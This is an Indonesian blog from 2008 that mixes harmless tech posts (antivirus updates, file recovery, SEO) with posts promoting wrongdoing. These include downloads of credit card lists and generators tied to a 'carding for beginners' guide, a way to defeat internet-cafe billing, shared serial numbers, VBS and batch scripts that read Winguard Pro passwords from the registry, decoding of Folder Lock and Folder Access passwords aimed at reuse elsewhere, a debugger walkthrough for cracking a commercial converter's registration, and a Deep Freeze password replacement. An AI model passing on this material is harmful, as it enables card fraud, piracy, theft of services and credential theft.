Warung Bebas

Tuesday, December 9, 2008

Update PCMAV 1.9 build 3




Segera update Antivirus anda dengan mendownload file update di atas.
Terima kasih.

Wednesday, November 26, 2008

ALL Free CC

Gunakan cara yang efektif dan aman seperti yang di jelaskan pada artikel sebelumnya tentang "Teknik Carding Untuk Pemula".
Jangan pernah takabur dan tamak karena ketamakan akan membuat kehancuran, manfaatkan seperlu nya....
Semua Resiko di tanggung sendiri yak....
hehehe.....

download aja semuanya disini :

creditscard054
c
reditscard065
creditscard023
Bestcreditcards
CreditCardinSAP
CreditCardGenerator
credit_card_valid
credit_cards
CreditCardOnlineValidator2.01
EasycreditCardChesker
credit-card-verifier
Credit.Card.Manager.Professional.v2.0.Retail
creditCardGeneratorgeneratesallinfoforcardandaddress
credit_card_generator2007_new
Credit_Card_Generator_v1.0b
Credit_Card_GeneratorWithCvv2IdCvc2Generator2007

Selamat menikmati.....

Teknik Carding Untuk Para Pemula

bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....

Download artikel Lengkap disini.

Tuesday, November 25, 2008

Memunculkan File yang di Hidden Virus

Sering saya jumpai beberapa masalah di dalam kehidupan IT ini, diantaranya adalah komputer kena virus dan file-file menjadi rusak. Diantara virus-virus yang saya jumpai, akhir-akhir ini di kalangan temen-temen saya, saya menemukan kasus yang sering terjadi karena virus. Biasanya temen-temen saya menggunakan anti virus dan kemudian mengakibatkan virus tersebut hilang dan Folder dan file ga keliatan lagi, karena pada dasarnya yang sebelumnya kelihatan itu adalah clone dari virus tersebut, jadi folder n file yang kita miliki itu di clone oleh virus dan menyembunyikan file dan folder aslinya, mungkin anggapan anda file dan folder tersebut ke apsu bersamaan dengan scan virus yang anda lakukan sebelumnya, tapi sebenarnya file dan folder tersebut tidaklah hilang, hanya di hidder dan hidden tersebut di read only sehingga susah untuk di unhiddennya, oleh karena itu ada trik tertentu untuk memunculkan kembali file dan folder tersebut yaitu dengan cara:

Download artikel lengkap disini.

Monday, November 24, 2008

12 Cara Mengakses Situs yang Diblokir


Pembatasan akses melalui jaringan internet sudah menjadi masalah umum di banyak negara, terutama di wilayah Asia. Jika akses ke suatu situs dan informasi dibatasi/diblokir oleh administrator jaringan atau ISP, maka pengguna yang berada di suatu tempat (sekolah,kantor, warnet, dll) atau negara akan mengalami kesulitan didalam mengaksesnya. Contoh layanan yang sering diblokir oleh berbagai negara/kantor adalah Youtube.

Pembatasan akses di lain pihak juga dilakukan oleh para penyedia konten untuk mencegah akses oleh pengguna yang berada di luar target pasarnya, biasanya karena masalah legal. Contohnya adalah layanan radio internet Pandora dan video streaming seperti Hulu, ABC dan bahkan Youtube (untuk video tertentu). Salah satu kasus besar terakhir adalah bagaimana Google menuruti kemauan pemerintahan AS untuk tidak menyediakan aplikasi miliknya kepada pengguna di Kuba, Syria, Korea Selatan, Iran dan Sudan.

Seperti kata pepatah, banyak jalan menuju Roma. Di bawah ini adalah berbagai cara yang dapat Anda coba untuk mengakses situs yang diblokir.

Download artikel lengkap disini.

13 Aplikasi Gratis untuk Membuat dan Hosting Situs Anda Sendiri

Di bawah ini terdapat daftar 13 aplikasi gratis yang dapat membantu Anda menciptakan dan meng-hosting situs Anda atau klien Anda. Untuk menggunakan aplikasi-aplikasi di bawah ini, Anda tidak membutuhkan keahlian desain dan atau pengetahuan teknis. Anda dapat menciptakan berbagai tipe situs dengan aplikasi-aplikasi ini dan beberapa di menawarkan pembuatan situs berbasis Flash dan sebagian lagi bersifat statis. Ada juga yang menawarkan fungsi blogging dan menciptakan galeri foto. Sebagian besar memang kurang dikenal, tapi memiliki fitur dan fungsi yang menakjubkan. Ok...Selamat membuat situs!

Download artikel lengkap disini.

Empat Linux Mini untuk Flash Disk Anda

Sekarang ini, hanya dibutuhkan sebuah flash disk mini dan program seperti UNetBootin untuk menciptakan sebuah Linux portabel yang bisa dijalankan di semua komputer yang mendukung boot dari USB. UNetbootin memiliki daftar distro yang didukung, tetapi tidak memberikan petunjuk mana pilihan yang terbaik untuk digunakan.

Di bawah ini, terdapat 4 program yang tidak perlu dijalankan dari hard disk yaitu: Damn Small Linux, Puppy Linux, Xubuntu dan Fedora. Baca beberapa penjelasannya di bawah ini dan silakan tentukan mana yang terbaik bagi anda.

Download artikel lengkap disini.

11 Situs Gratis untuk Bertukar File Besar dengan Cepat

File hosting gratis mungkin sudah tidak menjadi masalah besar dengan cepatnya perkembangan teknologi informasi yang sedemikian cepat, tetapi saat ini masih sulit untuk menemukan situs berkecepatan tinggi yang dapat membantu Anda untuk dengan mudah mengirim atau menerima file berukuran besar. Dan inilah 11 situs gratis yang bisa membantu Anda dalam mengirim atau menerima file berukuran besar:

Download artikel lengkap disini.

Panduan Dasar SEO oleh Google


Para webmaster sering menanyakan kepada pihak Google baik di konferensi ataupun di Webmaster Help Group "apa saja cara-cara mudah untuk meningkatkan performa situs di Google?" Kemungkinan ada banyak jawaban untuk pertanyaan tersebut, informasi tentang SEO (Search Engine Optimation) yang bisa Anda temukan di web juga sangat banyak sehingga sangat membingungkan bagi mereka yang awam. Untuk itu pihak Google merasa perlu membuat panduan ringkas yang merangkum berbagai teknik terbaik yang disarankan oleh tim pengembang Google dan bisa diikuti oleh para webmaster untuk meningkatkan kemampuan situs untuk diindeks oleh Crawler dan Bots.

Download artikel lengkap disini.

Thursday, November 20, 2008

4 Tools Gratis Mengembalikan File yang Terhapus

Pernah menghapus file-file penting di komputer tanpa disengaja? Kasus seperti ini mungkin pernah menimpa Anda, terkadang terjadi karena kita tengah terburu-buru atau dikejar waktu.

Namun jangan khawatir, Anda bisa menggunakan tools khusus untuk mengembalikan file-file tadi. Berikut ini ada 4 tools yang bisa Anda gunakan untuk mengembalikan file yang terhapus. Tools ini dapat di-download secara gratis di internet.

1. Undelete Plus
Di antara aplikasi-aplikasi gratis yang beredar di luaran untuk mengembalikan file yang terhapus, Undelete Plus salah satu yang dapat digunakan. User interface-nya (antar muka) tergolong sangat simpel. Anda dapat mengembalikan file-file yang terhapus dengan mudah sesuai dengan tipe file, misalnya Application, GIF graphics, HTML Documents, PDF.

Tools ini beroperasi pada sistem operasi Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 dan Windows Vista. Anda dapat men-download Undelete Plus disini.

2. Restoration
Restoration adalah salah satu aplikasi untuk mengembalikan file yang terhapus. Tools ini juga sangat mudah digunakan dan tidak perlu diinstal di komputer. Cukup download toolsnya disini, lalu jalankan file executable-nya untuk mengembalikan file yang terhapus.

3. PC Inspector File Recovery
Meski user interface PC inspector File Recovery tidak begitu user friendly, aplikasi ini tergolong sangat ampuh untuk mendeteksi dan mengembalikan file yang terhapus. Sesudah dilakukan proses scanning, akan tersaji file-file yang terhapus dalam folder dengan struktur pohon (tree structure) untuk mempermudah pencarian. Dengan begitu, Anda dengan mudah dapat mencari dan memilih file/folder yang terhapus, lalu klik icon "save" untuk mengembalikan file. Tools ini dapat di-download disini.

4. Recuva
Recuva sering disebut juga sebagai "Recover". User interface-nya sangat sederhana. Pada mode basic, tools ini akan menampilkan daftar file-file yang terhapus yang bisa dikembalikan. Jika Anda menggantinya ke mode advanced, maka proses scanning ulang akan dilakukan dan muncul pilihan untuk menampilkan informasi berisi daftar file-file yang terhapus. Tools ini dapat di-download disini.

Monday, November 17, 2008

PC Media Antivirus (PCMAV) 1.9


PC Media Antivirus terbaru, PCMAV 1.9 telah hadir bersamaan dengan Majalah PC Media 12/2008 yang saya beli kemarin. Menurut file README.txt yang disertakan, hal-hal yang baru pada versi terbaru ini adalah:

  • Ditambahkan, database pengenal dan pembersih 95 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 2254 virus beserta variannya yang banyak beredar di Indonesia telah dikenal di versi 1.9 ini oleh engine internal PCMAV.
  • Ditambahkan, cleaner khusus untuk virus Bungas.vbs.
  • Diperbaiki, kesalahan deteksi (false alarm) heuristik pada beberapa program dan script.
  • Diperbarui, perubahan beberapa nama virus mengikuti varian baru yang ditemukan.
  • Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV Cleaner & PCMAV RealTime Protector lebih dari sekadar antivirus biasa.
Download PCMAV 1.9 (2,36 MB) Download

Anda cukup mendownload dari salah satu link yang disediakan. Jika merasa bermasalah dengan salah satu server, Anda dapat mencoba dengan server lainnya. Untuk permintaan pengiriman file melalui email, mohon maaf, saya tidak dapat mengabulkan.

Update untuk PCMAV 1.9

Jika saat menggunakan PCMAV Anda terhubung ke internet, Anda akan mendapatkan informasi keberadaan update terbaru dari PCMAV. Untuk melakukannya secara manual, file update berikut hanya ditujukan untuk PCMAV 1.9 saja dan tidak dapat digunakan untuk update PCMAV versi sebelumnya atau selanjutnya:

- PCMAV 1.9 Update Build 1 download

Ekstrak file PCMAV.vdb pada direktori yang sama dengan PCMAV 1.9.

Cara membuat Read More ... ... ... di Blogger (2)

Bagi para sobat yang menggunakan template baru tentu saja akan mengalami kebingungan ketika membaca tutorial terdahulu yang membahas tentang membuat menu Read more.. atau menu Baca selengkapnya.., karena tutorial tersebut memang di peruntukan bagi para sobat yang menggunakan template klasik. Nah bagi sobat yang menggunakan template baru dan ingin menggunakan menu Read more.. juga silahkan ikuti langkah-langkah berikut :

Download Artikel lengkap disini.

Wednesday, November 12, 2008

Berbagi Serial Number

Berbagi adalah suatu perbuatan mulia yang di ajurkan oleh Tuhan, apalagi kepada mereka yang saling membutuhkan. Semoga Serial Number ini ada manfaatnya, terimakasih!!

Download Serial number disini.

Langkah - langkah membuat wifi-hotspot

Hotspot atau tempat yang menyediakan layanan akses Internet dengan menggunakan wireless memang sudah sangat banyak. Mulai dari cafe, restoran, sampai hotel pada umumnya menyediakan layanan Internet tanpa kabel ini. Hal ini disebabkan banyaknya perangkat yang telah dilengkapi dengan teknologi wireless, sehingga tren penggunaannya pun semakin tinggi.

Sayangnya, tidak semua orang mengerti bagaimana cara membangun infrastruktur Wi-Fi. Kurangnya informasi dan mungkin harga yang agak mahal membuat banyak pemilik tempat usaha enggan untuk membangun hotspot. Padahal, adanya hotspot ini sangat berpotensi untuk menambah daya tarik dan juga bisa menambah penghasilan dari tempat itu sendiri.

Artikel ini akan membahas hal-hal penting yang perlu Anda ketahui untuk menyediakan layanan hotspot. Hal yang dibahas memang relatif sederhana sehingga bisa diikuti oleh pemula sekalipun (asalkan sudah memiliki dasar-dasar jaringan). Di akhir artikel, akan juga akan membahas salah satu alat yang cukup praktis untuk digunakan sebagai hotspot gateway.

1. Tentukan konsep hotspot Anda

Konsep hotspot ini merupakan awal yang sangat penting untuk Anda tentukan. Apakah hotspot Anda nantinya akan dapat digunakan secara gratis atau harus membeli voucher tertentu? Anda harus menentukan hal dasar ini terlebih dahulu karena akan menyangkut perencaaan infrastruktur hotspot itu sendiri.

Download Lenkap disini.

Cara Membuat Read More ... di Blogger (1)

Topik yang sedikit aneh kedengarannya, "membuat Read More" maksudnya apa? Begini ceritanya dari awal saya sudah kurang sreg dengan tampilan blog yang setiap postingnya menampilkan hasil postingan secara utuh dari a-z sehingga pembaca dari sisi "eyes capture" tidak menarik. saya melihat beberapa tempat yang menggunakan fungsi expandable atau dikenal dengan "Read me" itu bahasa lumrahnya di dunia internet.

Dimana hanya menampilkan beberapa potongan saja sebagi resume, dan selanjutnya untuk mengethaui secara lebih detail maka pembaca hanya meng-klik tulisan link "Read More". Ya sudahlah kepanjangan ngobrolnya. Kita mulai pembahasannya. Bagi para sobat yang baru mulai membuat blog, mungkin belum mengetahui informasi ini dan mudah-mudahan dengan membaca artikel ini dapat menambah pengetahuan kita tentang yang namanya nge-blog.

Download lengkap disini.

Tuesday, November 4, 2008

Cara Membobol Semua Jenis Billing Warnet

Membobol Semua Jenis Billing Warnet

Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia


Cara pertama

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.

Mau artikel selengkapnya..!!
Silahkan download disini.

Friday, October 17, 2008

Membuat Script untuk mengintip password Winguard Pro 2007

Selamat Pagi, Saudara sebangsa setanah air, senang sekali saya bisa berjumpa kembali dengan anda ( kok kayak MC ya ? )

Pada kesempatan kali ini saya ingin berbagi cara membuat script untuk mendapatkan password Winguard Pro terutama untuk versi 2007.

Seperti kita ketahui Winguard Pro adalah termasuk salah satu program populer di warnet-warnet so anak warnet - jangat lewatkan tutorial ini.

Kali ini saya ingin membagi dua macam script yang satu bat yang satu vbs, pokoknya semua kebagian deh ...(Hi hi hi kayak pembagian BLT aja)

OKe ...saya hentikan dulu basa-basinya.

Sekarang kita mulai dulu dengan script vbs :

Untuk mengintip password Winguard Pro dengan cepat, ketiklah tulisan di bawah ini dengan Notepad dan simpan dengan ekstensi vbs



' INTIP WINGUARD PRO 2007

Dim WinguardPro2007, Registri, BacaPassword_00, BacaPassword_01, BacaPassword_02



Set WinguardPro2007 = CreateObject("WScript.Shell")

Registri = "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management"

on error resume next

BacaPassword_00 = WinguardPro2007.RegRead(Registri & "title0")

BacaPassword_01 = WinguardPro2007.RegRead(Registri & "title1")

BacaPassword_02 = WinguardPro2007.regread(Registri & "title2")

WScript.echo "Intip Winguard Pro 2007 - by Eko.A"& vbcrlf &_

""& vbcrlf &_

"Password Enkripsi File : "& BacaPassword_00 & vbcrlf &_

"Password Konfigurasi : "& BacaPassword_01 & vbcrlf &_

"Password Program : "& BacaPassword_02


Bagi sampeyan yang lebih senang dengan script bat, ketik script dibawah ini dengan Notepad dan simpan dengan ekstensi bat.



@ECHO OFF

Title Intip Password Winguard Pro versi 2007

Echo.

Rem delims : TAB diikuti spasi

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title0') DO SET Pass_Enkrips=%%B

ECHO Password Enkripsi File = %Pass_Enkrips%

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title1') DO SET Pass_Konfig=%%B

ECHO Password Konfigurasi = %Pass_Konfig%

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title2') DO SET Pass_Aplik=%%B

ECHO Password Program = %Pass_Aplik%

Echo.

pause

exit

Cara Mudah Decrypt Password Folder Lock 5.8/5.9

pada kesempatan ini ingin berbagi cara mendekrip atau membaca isi password Folder Lock termasuk Folder Lock yang terbaru saat ini yaitu versi 5.9.

Cara mendekrip password FolderLock tidak terlalu sulit. Langkah-langkahnya adalah sebagai berikut :

Buka registry pada bagian :
HKEY_CURRENT_USERSoftwareMicrosoftWindowsQualityControl
_pack = "ini password tersandikan"

Anggap saja isi dari _pack = espxttbqfwpm~~~~

Pertama-tama : Abaikan tanda uler keket ~~~~ karena lambang itu tidak dibaca oleh file konfigurasinya.

Kemudian balik isi password yang terbaca di registry : espxttbqfwpm kalo dibalik akan menjadi
mpwfqbtt ...dan seterusnya.


Langkah selanjutnya mundurkan semua karakter masing-masing sebanyak satu karakter.
m diundurkan satu karakter menjadi l karena l letaknya satu karakter sebelum m
p diundurkan menjadi o
w menjadi v dan seterusnya

Sampai akhirnya terbacalah password aslinya yaitu :lovepassword.

Mudah sekali bukan membaca password FolderLock.

Cara Mudah Men-decrypt Folder Access

Folder Access adalah program pelindung folder gratis. Karena gratis itulah mungkin program ini jadi lumayan disukai. Program ini bisa panjenengan download di http://www.topdownloadsnet.com/.

Untuk mereset password Folder Access, caranya cukup mudah : kita hapus saja file mklf.dll seperti yang pernah dibahas oleh rekan saya di TopengDigital.
http://topengdigital.blogsome.com/2008/05/22/mereset-password-folder-access-200-free/

Tetapi pada saat ini kita tidak ingin mereset passwordnya – kita justru ingin tahu apa isi passwordnya.

Mungkin ada di antara teman-teman yang protes - kalau password bisa direset dengan mudah - mengapa pula kita harus tahu isi passwordnya. Jawaban terhadap pertanyaan semacam itu tentu bisa bermacam-macam. Ada yang karena iseng. Ada yang penasaran kepengin tahu apa sih sesungguhnya password lama yang kita lupakan.

Oaaaalah, ternyata itu to passwordnya....

Atau ada juga yang melakukan ini - sebagai semacam eksperimen untuk mendapatkan password aplikasi, password file atau account internet yang lain.

Kita tahu meskipun bangsa Indonesia atau kebanyakan manusia di dunia bukanlah seorang komunis. Tetapi dalam masalah membuat password, seringkali “budaya komunis” masih dipakai. Kebiasaan “komunis” yang sering kita pakai pakai adalah : satu untuk semua. Satu password untuk beragam aplikasi, file penting dan account internet. Alasan klasik yang sering dipakai adalah takut lupa password. Kebiasaan ini dilakukan oleh hampir semua orang - baik yang sebenarnya tahu bahayanya, apalagi bagi yang tidak tahu.

Karena ada cukup banyak manusia yang melakukan kebiasaan inilah - maka mendapatkan sebuah password apapun, kadangkala bisa lebih berharga ketimbang sekedar melewati proteksi atau by pass security. Karena ada kemungkinan password yang kita dapatkan, juga bisa dipakai untuk file penting, account internet atau aplikasi lain yang lebih berharga.

Baiklah, saya rasa sudah cukup pidatonya, toh 100 Tahun Kebangkitan Nasional juga sudah lewat cukup lama. He..he..he

Ok - untuk men-decrypt atau mendapatkan password dari Folder Access, caranya seperti ini :

Buka file mklf.dll yang terletak di folder system32 dengan Notepad atau Wordpad.
Anggap saja isi dari file mklf.dll yang terbaca adalah :

“ ‰šžŒŒˆ›

Kita ubah masing-masing karakter ASCII tersebut menjadi code decimalnya.
Cara paling gampang untuk mengubah sebuah karakter menjadi code decimal adalah dengan memakai fungsi dari program spreadsheet semacam Excel atau OpenOffice. Fungsi yang bisa kita pakai adalah = code(karakter). Silakan baca sendiri help untuk fungsi ini.

Baiklah anggap saja kita sudah berhasil melakukan itu. Kita sudah mendapatkan code decimal untuk masing-masing karakter.
Karakter “ codenya adalah 147
Karakter  codenya adalah 144
Karakter ‰ codenya adalah 137
Karakter š codenya adalah 154 ,dan seterusnya.

Untuk mendapatkan password aslinya, kita bisa memakai rumus seperti ini :

Password asli = 255 – password tersandikan. (perhitungan dalam decimal)

255 dikurangi 147 = 108
255 dikurangi 144 = 111
255 dikurangi 137 = 118
255 dikurangi 154 = 101

Selanjutnya ubah semua code di atas menjadi karakter kembali. Cara paling mudah untuk melakukan ini adalah memakai fungsi char(code).

Char(108) = l
char(111) = o
char (118) =v
dan seterusnya.

Password Folder Access yang berhasil kita dapatkan adalah : “lovepassword”(tanpa tanda petik). Tinggal isikan saja password tersebut ke kotak passwordnya.

Bagaimana Cara Cracking md5 ciphered text ??

LOGIKA :
md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.

md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.

contoh :
plaintext : malcoder
ciphertext : 8c6d8aed6dc647db4e98ded91049e998

plaintext : apapunlah
ciphertext : 15cdd0fd997178efc32991ea5a5008ea

plaintext : a
ciphertext : 0cc175b9c0f1b6a831c399e269772661

itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....

caranya :
harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...
nah lalu kenapa bisa dicrack ??
yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...

TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..
"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...

binun ??? hehehe... yaudah saya jelaskan...

misalnya :

md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33

trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:

plaintext | Ciphertext
a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok
b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok
c 4a8a08f09d37b73795649038408b5f33 {== COCOK

setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??
dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"

CRACKED ... tugas selesaiii..

mudah2an bisa dimengerti...

Cracking Cool Media to Mp3 Wav Converter 3.01

Intro:
Udah lama banget aku ga bikin tuts lagi.. semua akibat kesibukan gw akhir2 ini yang menumpuk.. heheheh.. but..finally, aku membuat tuts lagi pada hari minggu 6 Juli 2008 yang cerah ini, diiringi lagu Wali-Dik…. J J
Tentang Target:
Cool Media to Mp3 Wav Converter is a powerful tool for converting Real Video files (*.ra; *.rm; *.rv;*.rmvb;*.rmj;*.rms;*.ram;*.rmm;*.rax;*.rvx;*.rp), Mpeg files (*.mpg; *.mpeg; *.mpa), Avi Files, Windows Media Files (*.wma; *.wmv; *.wm; *.asf; *.asx; *.wax; *.wvx; *.wmx), Midi files (*.mid; *.midi; *.rmi), Monkey's Audio files (*.ape) to Audio(*.MP3, *.WAV) format with CD quality.
Cool Media to Mp3 Wav Converter provides perfect sound quality and fast converting speed which saves your time greatly.
With Cool Media to Mp3 Wav Converter's handy intuitive interface and design, you'll find it very easy to use. Whatever you are, a professional or a beginner, you will feel cool media to mp3 wav converter is really developed for you!
Proteksi :
- Trial 3 kali pengunaan ç Hanya 3 kali.. buset deh...
- Serial Number

Tools :
1. PEID 0.94
2. Ollydbg v.1.10 (diabloo edition)
3 . Sedikit Logika yang kupikir kita semua memilikinya

Evaluasi Program :
Install Cool Media to Mp3 Wav Converter 3.01 pada PC anda.. (ya iya lah.. klo ga diinstall gmn bisa di krek, heheheh) kemudian jalankan.. anda akan melihat nag screen seperti ini :





(tampilan nag… saya telah menjalankan 2 kali sebelumnya)

Kalau di klik tombol register.. maka akan ada input nama dan serial, isikan saja sembarang, misalnya username: X-Bite dan reg kode: 1111111111111111…. Pencet OK









Wow kk wow… ternyata… username dan reg kodenya kagak bener kata neh sopwer…. Hmm yawdah.. diinget2 dah pesen errornya…

Cracking Target:
Sebelum menjalankan target pada ollydbg, mendingan kita cek dulu ne sopwer, pake packer ga (seandaynya pake.. kita musti kerja lebih keras, wkwkwkkw) jalan kan PEiD kita, kemudian open file MediaConverter.exe di lokasi “C:\Program Files\Media to mp3 wav converter\” itu jika kamu install pada default path looooo….. ^^
Hasilnya akan seperti gambar berikut ini..





(tampilan PEiD saat membuka file target)

Taaadaaaa… ternyata ne sopwer ga pake packer, jadi lebih santay deh.. ^^ dan lagian setelah cek pake plugin kripto analyzer ternyata.. ne sopwer jg ga ada pake kripto2an..

Oke… sekarang.. buka ollydbg, ataw kalo maw lebih mudah, setting ollydbg kita bikin ada di win explorer, caranya.. di optionnya olldbg, pilih add to explorer… kemudian “Add ollydbg to bla.. bla.. bla..” setelah itu tinggal klik kanan pada MediaConverter.exe (di win explorer) dan pilih Open with ollydebugger..


Nah, sekarang.. target telah dibuka dalam ollydbg… masih inget pesen error yang tadi? Lgsg aja klik kanan>>search for>> all referenced text string.. kemudian pada jendela baru yang muncul search for text… isi dengan “pair” lalu search.. akan muncul seperti ini

(tampilan all referenced text string setelah di search…)
Wah.. wah.. apa yang kita leat disitu??? Please input user name???? Please input registration code???? Kayaknya udah jelas.. kalaw kita udah mampir pada bagian registrasinya program ini deh.. lgsg aja deh ke alamat 40AE0A, yaitu alamat kalaw kita berhasil memasukan kode dengan benar…. Perhatikan call di 40ADE0.. hmm kayaknya neh call yang menentukan kalaw username dan reg code yang kita masukin valid apa nggak….(karena.. jump dibawahnya menuju ke Incorrect bla..bla..) Dah,, coba breakpoint aja disitu (f2) biar tahu kebenarannya.. lalu jalankan program (f9) pencet register.. isi lagi username dan reg codenya.. OK..

Eit.. tuh program beneran berhenti disitu.. hohoho.. lgsg aja step in dalam call tersebut (f7).. eh.. disitu ada sebuah call lagi di alamat 403F40 (yg telah saya coba beberapa kali, kalaw ne call memeriksa username kita), masuk lagi ke dalam call tersebut (f7)




Perhatikan baik2 perintah diatas…. Maksud perintah tersebut adalah mengkopi byte dari pointer DS:[EAX+1] ke register ECX, dimana pointer DS:[EAX=1] dpt kita lihat di kolom register sebelah kanan kalaw isi pointer EAX=’X-Bite’…. Jadi EAX+1 adalah karakter ‘-‘…. Kemudian dapat dilihat kalaw ECX dan EDX akan dibandingkan (CMP).. saat di compare EDX bernilai 44h dan ECX bernilai 2D…





ECX=2Dh=karakter ‘-‘ (karakter kedua dari X-Bite)
EDX=44h=karakter ????

Setelah saya bertanya pada dukun terdekat…. (tapi boong) ternyata 44h adalah karakter ‘D’ (sebenarnya gw cek pake program ASCII Table, huahuahuahauhau)




Karena pake user X-Bite ga bisa lewatin call yang satu itu.. saya lalu mencoba bagaimana kalaw saya ikutin aja maw tuh program… kita pakay karakter ‘D’ pada karakter username + 1 (karakter kedua), misalnya ADRIANO, EDUARDO, IDLE, dan laen-laen sebagaynya… dengan reg code 111111111111111111111…..

Dan ternyata.. lewat juga tuh call, ahahahhaha.. telusuri lagi satu persatu dengan menggunakan f8… sampay pada call 404004, saya melihat sesuatu yang mencurigakan..




1111-1111-0000-0000 <<< apa ini??? Saat saya melihat alamat 404005, isinya adalah 111111111111111 kita…hmmm apa ini serial nya?? Ga salah kah?? Coba deh gw input di reg code nya……
Username: ADRIANO
Reg Code: 1111-1111-0000-0000
Dan hasil nya????????





Well.. agak aneh.. masa seh serial nya gitu doank???? Males gw periksa lagi setelah gw coba buka beberapa kali ne program tetep aja udah full version, yg penting neh program udah kreked.. hahahah

Registered Version... Program is Cracked..

Mengatasi Lupa Password Deep Freeze 5 dan Lupa Password Deep Freeze 6

Hi Hi Hi...selamat siang saudara sebangsa maupun tidak sebangsa. Selamat berjumpa lagi dengan saya Lovepassword. Saya lagi masuk angin hari ini, dan kata sumber yang tidak bisa dipercaya saya harus banyak-banyak tertawa untuk membuang angin. Karena itulah saya terpaksa banyak tertawa hari ini. Hi Hi Hi.....- hi hi hi 13x.

Oke deh, saudara sebangsa maupun tidak sebangsa kita langsung saja masuk ke topik utama kita ya ? Yaitu cara mengatasi lupa password Deep Freeze 5 dan Deep Freeze 6.

Yak..1....2....3.....Mulai.

Deep Freeze adalah salah satu program "pengaman" yang paling populer di warnet. Program ini memang cukup powerfull dalam menghadapi virus maupun tingkah laku usil pengunjung warnet. Apapun perubahan yang dilakukan oleh virus maupun pengunjung akan dikembalikan seperti kondisi semula oleh DF.

Sayangnya karena terlena oleh kemudahan ini, beberapa admin warnet kadang jadi lupa dengan password DF, akibatnya admin kebingungan ketika hendak menginstall program baru karena program tersebut akan ditendang lagi oleg Deep Freeze.

Berikut ini salah satu cara untuk mereset password DeepFreeze yang sudah saya coba dengan DF 5 dan DF 6.

Untuk DF 5 :

1. Install Df di kompie lain yang tidak terproteksi dengan DF. Set passwordnya sesuka anda. Agar saat ini rekan-rekan dengan saya, kita anggap saja password barunya adalah "bakmi"(tanpa tanda kutip).

2.Untuk DF 5, password DF tersebut disimpan di file bernama Persi0.sys yang terletak di drive C

Cara mereset passwordnya logikanya lumayan gampang seh : Kita replace saja file persi0.sys lama yang passwordnya kita lupa dengan file persi0.sys baru yang tentu saja passwordnya kita tahu karena baru saja kita buat.

3. hanya saja sampe saat ini proses mereplace ini setahu saya ternyata nggak gampang-gampang amat karena belum ada yang bisa melakukan dalam normal windows. (Bagi rekan-rekan yang tahu caranya silakan memberi masukan ). File persi0.sys tidak mau ditindih dengan file persi0.sys baru dalam normal wondows karena terproteksi oleh DF yang sedang berjalan.

4. Karena file persi0.sys tidak bisa diganggu gugat dalam normal windows maka kita terpaksa mencari cara lain. Anda bisa mencoba memakai sistem operasi lain, sistem operasi portabel, dan sebagainya untuk mereplace file persi0.sys. Tetapi saya pribadi cukup puas dengan memakai Recovery Consol milik Windows XP Prof Edition.

5. Anggap saja kita memakai CD Windows XP Professional untuk masuk DOS versi XP(Recovery Console Windows XP). Restart komputer. Set BIOS untuk boot lewat CD. Tekan enter untuk masuk CD Windows. Tunggu sampai muncul tulisan Windows XP Professional Setup. Muncul 3 pilihan : To Setup Windows XP Now, press Enter ; To repair a Windows XP installation using Recovery Console, press R ; To quit setup without installing Windows XP, press F3. Pilih/tekan R (to repair) untuk masuk ke dalam Recovery Console.

6. Isikan password admin anda. Bila dulu saat anda menginstall, tidak memasang password, tinggal tekan enter. Muncul prompt : C:Windows>

7.Copi file Persi0.sys dengan nama lain. Karena file Persi0.sys menyimpan password Bakmi, maka pada contoh ini file persi0.sys saya copi menjadi Bakmi.sys.

C:Windows> cd c: ---- pindah direktori ke C:
C:>copy persi0.sys Bakmi.sys ---- copi persi0.sys dengan nama lain
C:>exit ---- keluar

8. Masuk windows normal, copikan file Bakmi.sys di komputer teman anda tersebut ke dalam CD atau USB.

